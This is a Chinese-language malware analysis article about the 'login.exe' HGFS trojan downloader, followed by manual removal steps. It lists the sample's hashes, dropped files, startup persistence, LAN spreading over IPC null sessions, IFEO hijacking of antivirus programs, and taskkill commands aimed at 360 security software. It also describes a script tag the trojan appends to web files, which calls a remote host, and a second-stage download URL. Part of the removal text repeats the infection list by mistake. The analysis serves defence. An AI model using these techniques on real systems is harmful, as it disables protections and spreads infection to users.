科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道login.exe HGFS木马下载器的手动查杀方法

login.exe HGFS木马下载器的手动查杀方法

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

病毒初始化:创建互斥量HGFSMUTEX,保证系统内只有一个实例在运行

来源:论坛整理 2008年12月6日

关键字: 病毒资料 病毒查杀 安全防范

  • 评论
  • 分享微博
  • 分享邮件

样本信息:File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203
1.病毒初始化:创建互斥量HGFSMUTEX,保证系统内只有一个实例在运行
2.释放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe
3.执行connnet.bat批处理内的内容
a.遍历d~z盘 复制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目录下
b.判断中毒机器是否处于局域网,如果是则利用ipc漏洞建立一个空连接,并把autorun.exe和%autorun.inf复制到机器的C$下面。
4.IFEO劫持某些杀毒软件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不给你启动.exe
5.试图结束360软件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f
6.遍历所有磁盘删除.gho文件
7.遍历所有磁盘感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代码
8.链接网络下载木马
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但链接已经失效
解决方法:
1.复制如下文字 到剪贴板(假设系统在C盘)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

打开Xdelbox.exe
在下面的大框中 单击右键 点击 “剪贴板导入不检查路径”
之后刚才复制的那个文件列表将出现在下面的大框中
然后再在下面的大框中单击右键 点击 “立即重启执行删除”
软件会自动重启计算机
重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
不用你管,它会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后他会自动重启进入正常模式
2.打开sreng 启动项目 注册表
删除所有红色的IFEO项目
3.建议屏蔽http://17vp.cn网站
本文来自: 脚本之家(www.jb51.net) 详细出处参考:http://www.jb51.net/article/14393.htm

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章